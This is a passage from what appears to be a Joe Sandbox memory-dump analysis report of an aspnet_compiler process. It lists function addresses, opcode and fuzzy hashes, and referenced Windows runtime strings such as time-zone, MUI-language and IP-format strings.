                                                              • API String ID:
                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                              Function 00A8FEA0 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                              Function 00A8FED0 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Function 00A8FE24 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                              Function 00A8FFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Function 00A8FFFC Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                              Function 00A8FF34 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                              Function 00AB8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00AB8914
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00AB87E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 00AB89FC
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00AB8827
                                                              • WindowsExcludedProcs, xrefs: 00AB87C1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
                                                              • Instruction ID: 59cd9e3976bd37492c93a86fbbf6917b8b3323d22a616b77c874ab6d23557c66
                                                              • Opcode Fuzzy Hash: 390cfeed30c18dddca763cb40f6a5927edf50dcaa3da8a75ddd761fc214e50d9
                                                              • Instruction Fuzzy Hash: B0F1C6B2D00209EFCF11DF99CA819EEBBFDFB08300F15456AE505A7252EB359A45DB60
                                                              Function 00B2822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: _wcsnlen
                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                              • API String ID: 3628947076-1387797911
                                                              • Opcode ID: a637839d2e09a305cf3f608d55d6f7d8f18763d67be6ac11541bbec9c3a3991c
                                                              • Instruction ID: cc6d61ba8bcba84e1af7061292babb006a7db0b3c3c6d64477157741f3fb39e3
                                                              • Opcode Fuzzy Hash: a637839d2e09a305cf3f608d55d6f7d8f18763d67be6ac11541bbec9c3a3991c
                                                              • Instruction Fuzzy Hash: AE41B871241269BEEB11DA91EC82FDF77ECEF08B44F100591BA08E51D1DBB1EB119BA4
                                                              Function 00AD13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
                                                              • Instruction ID: 4dfb7f8de540df7a903ecac461e7bf9b73ac6c8e1c49688a5e0d05e6d987776c
                                                              • Opcode Fuzzy Hash: 04598611dfbf8fc6e6f5dc035ae7c422898f4749e5145ee7a5396cde820ba6d5
                                                              • Instruction Fuzzy Hash: E461F3F1A04659BACF34DFA9C8808BFBBF5EF94300B54C52EF59647641D274AA40DBA0
                                                              Function 00B33B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: db706625c897ec96cc203bd59315b395db61b35e57a89a51edb13f663358cd2a
                                                              • Instruction ID: c08dbaaac28b7bd2e8a3032c31bdb5d88d8e54612ebfc68fc953ee7acedcc20c
                                                              • Opcode Fuzzy Hash: db706625c897ec96cc203bd59315b395db61b35e57a89a51edb13f663358cd2a
                                                              • Instruction Fuzzy Hash: 21618076A04748BECF209F59C8404BFBBF5EF54711F64C5A9F8A997141E234EB809B50
                                                              Function 00AC7EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00AE3F12
                                                              Strings
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00AEE345
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00AE3F4A
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00AE3EC4
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00AEE2FB
                                                              • Execute=1, xrefs: 00AE3F5E
                                                              • ExecuteOptions, xrefs: 00AE3F04
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00AE3F75
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
                                                              • Instruction ID: 72287aa82336355fac3ada804c5d90a5034f0a6f4f34408460f48bbbaf7fc8b3
                                                              • Opcode Fuzzy Hash: 7489a850f63642bc80e970bde8ce048c0ee29f2cf628c57c53f9db77ab9577e3
                                                              • Instruction Fuzzy Hash: 7D416572A4025D7ADF20DAA59CCAFDE73FCAB54700F0005ADB509A7191EA709A45CFA1
                                                              Function 00AD0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: e01486372bba3c26e3e4b224a0d344bfc58651747f18ffa6e45564a73dcbd73b
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 43A18871A1430AEFCB24CFA4C845BFEB7B4AF45305F24856BE853A7392D6349A41CB52
                                                              Function 00AD0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF2206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
                                                              • Instruction ID: f89bb168b73f8f71d7174dc67c4b90296179cf8e094259e946654f41a3dbd64c
                                                              • Opcode Fuzzy Hash: 3ec43cd313f5ea90dd84a8204071e69fa0e223610f7f33fa4eaacde822dc4bc1
                                                              • Instruction Fuzzy Hash: AF512B727002056FDF14CB59CC81FB633A9AF98710F218269FE59DF285DA71EC418794
                                                              Function 00AD14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___swprintf_l.LIBCMT ref: 00AFEA22
                                                                • Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD146B
                                                                • Part of subcall function 00AD13CB: ___swprintf_l.LIBCMT ref: 00AD1490
                                                              • ___swprintf_l.LIBCMT ref: 00AD156D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
                                                              • Instruction ID: 52245cb2697849116c7b7105d5258c927a55211533dad7c08a6bff19bce6b901
                                                              • Opcode Fuzzy Hash: 9e554ad090064d07cbae9548f5001f6616bf3d60bcec0da39ec003d9d06d9e06
                                                              • Instruction Fuzzy Hash: 1F21B172A00219BBCF20DF68DD41AEF73BCBB50700F444516F946D3241DB799A588BE0
                                                              Function 00B33DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: true
                                                              • Associated: 00000010.00000002.554231034.0000000000A70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B74000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000B80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000010.00000002.554231034.0000000000BE0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_a70000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: c5de136645e647eb756b9f45438c954840fbdd8ce53c1be803ed137ad18e019f
                                                              • Instruction ID: d1233e0ab2bb8beac28b2a250f7d53fb88d68d006a377a96885c90ec5720d094
                                                              • Opcode Fuzzy Hash: c5de136645e647eb756b9f45438c954840fbdd8ce53c1be803ed137ad18e019f
                                                              • Instruction Fuzzy Hash: DB217F72A0022ABBCB20AE69DC459EF77ECEB14B14F140565FC08A7141EB749F84C7E1
                                                              Function 00AB53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF22F4
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 00AF230B
                                                              • RTL: Re-Waiting, xrefs: 00AF2328
